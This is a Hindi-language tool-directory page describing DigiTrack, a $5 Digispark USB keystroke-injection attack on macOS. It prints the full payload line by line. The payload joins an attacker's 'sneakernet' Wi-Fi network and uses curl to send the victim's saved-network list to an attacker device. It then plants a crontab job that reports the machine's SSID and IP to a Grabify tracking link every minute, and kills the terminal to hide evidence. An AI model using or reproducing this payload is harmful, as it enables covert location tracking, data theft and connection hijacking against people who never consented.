Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
DigiTrack — Arduino का उपयोग करके $5 या उससे कम में हमले | Kitploit
उपकरण/GitHubGitHub/skickar/digitrack
वाई-फाई ऑडिटिंगस्थायित्व तंत्रजानकारी एकत्र करनाहार्डवेयर हैकिंगरेड टीमिंग
GitHubskickar/digitrack

DigiTrack

Arduino का उपयोग करके $5 या उससे कम में हमले

रिपॉजिटरी देखें
81157 साल पहलेKitploit द्वारा समीक्षित

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

DigiTrack

30 सेकंड में, यह हमला यह जान सकता है कि MacOS कंप्यूटर ने पहले किन नेटवर्कों से कनेक्ट किया है, और एक स्क्रिप्ट डाल सकता है जो हर 60 सेकंड में वर्तमान IP पता और Wi-Fi नेटवर्क को ट्रैक करता है।

alt text

अब शामिल है: Hardtracker - Digispark VPN बस्टर जो MacOS कंप्यूटर पर आस-पास के Wi-Fi नेटवर्कों का IP पता और BSSID/SSID हर 60 सेकंड में Grabify ट्रैकर को भेजता है।

यह $5 का हमला है जो कुछ चीज़ें करता है:

  1. पीड़ित के कंप्यूटर में Wi-Fi बैकडोर डालता है, जिससे आप Wi-Fi रेंज में होने पर किसी भी समय पीड़ित का डेटा कनेक्शन कैप्चर कर सकते हैं।
  2. हर उस नेटवर्क की सूची चुराता है जिससे पीड़ित कभी कनेक्ट हुआ है (ट्रैकिंग, वर्गीकरण और डेटा कनेक्शन अपहरण के लिए)।
  3. एक ट्रैकिंग कार्य डालता है जो हर 60 सेकंड में IP पता और वर्तमान में कनेक्टेड नेटवर्क को Grabify लिंक पर भेजता है।

हमला इस प्रकार है: पीड़ित 30 सेकंड के लिए MacOS कंप्यूटर को अकेला छोड़ देता है। हमलावर एक DigiSpark बोर्ड डालता है जिसमें हमला पेलोड लोड होता है। पेलोड इस प्रकार दिखता है (देरी और एकल कीस्ट्रोक्स हटाकर):

DigiKeyboard.print("networksetup -setairportnetwork en0 'sneakernet' 00000000");

  • हम नेटवर्क "Sneakernet" को अपनी विश्वसनीय नेटवर्क सूची में जोड़ते हैं और उससे जुड़ते हैं।

DigiKeyboard.print("curl -m 10 --silent --output /dev/null -X POST -H "Content-Type: text/plain" --data "$(networksetup -listpreferredwirelessnetworks en0)" 192.168.4.1 &");

  • कनेक्ट होने के बाद, हम "Sneakernet" नेटवर्क बनाने वाले esp8266 को एक CURL अनुरोध भेजते हैं जिसमें MacOS कंप्यूटर ने अतीत में जिन सभी नेटवर्कों से कनेक्ट किया है, उनकी सूची होती है। & प्रक्रिया को पृष्ठभूमि में डालता है ताकि यदि इसमें अधिक समय लगे तो भी काम चलता रहे, और -m 10 सेकंड का टाइमर सेट करता है ताकि यह बहुत अधिक समय न ले। अब हम जानते हैं कि पीड़ित किन Wi-Fi नेटवर्कों में शामिल हुआ है, और कौन से नेटवर्क कंप्यूटर को बिना पूछे कनेक्ट करने के लिए मजबूर करेंगे।

DigiKeyboard.print("export VISUAL=nano; crontab -e");

  • हम एक कार्य बनाते हैं जो हर 60 सेकंड में निष्पादित होगा।

DigiKeyboard.print("* * * * * curl --silent --output /dev/null --referer "$(/System/Library/PrivateFrameworks/Apple80211.framework/Versions/Current/Resources/airport -I | awk '/ SSID/ {print substr($0, index($0, $2))}')" https://grabi/YOURLINK");

  • हम CURL के आउटपुट को दबाते हैं, और वर्तमान में कनेक्टेड Wi-Fi नेटवर्क का नाम प्राप्त करते हैं। हम इसे एक ट्रैकिंग URL पर CURL अनुरोध के साथ भेजते हैं, जो हर 60 सेकंड में लक्ष्य का IP पता और वर्तमान में कनेक्टेड Wi-Fi नेटवर्क प्रदान करता है।

DigiKeyboard.print("wait && kill -9 $(ps -p $PPID -o ppid=)");

  • अंत में, हम सभी पृष्ठभूमि प्रक्रियाओं के समाप्त होने की प्रतीक्षा करते हैं, और सबूत छिपाने के लिए टर्मिनल विंडो को पूरी तरह से मार देते हैं।

कुल चलने का समय लगभग 30 सेकंड है, जिसमें Digispark द्वारा स्केच अपलोड करने के लिए प्रतीक्षा करने के कुछ सेकंड शामिल नहीं हैं।

नोट्स: Grabify "I'm under attack" मोड में जा सकता है और चेक-इन की अनुमति नहीं दे सकता। इस लाइन को देखें: div class="cf-browser-verification cf-im-under-attack"

यदि आप इसे देखते हैं, तो IP पता Cloudflare द्वारा अवरुद्ध किया जा रहा है।

टूल डाउनलोड करें